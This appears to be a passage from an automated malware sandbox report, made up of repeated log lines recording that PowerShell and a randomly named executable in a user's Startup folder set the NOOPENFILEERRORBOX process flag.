                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                      Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
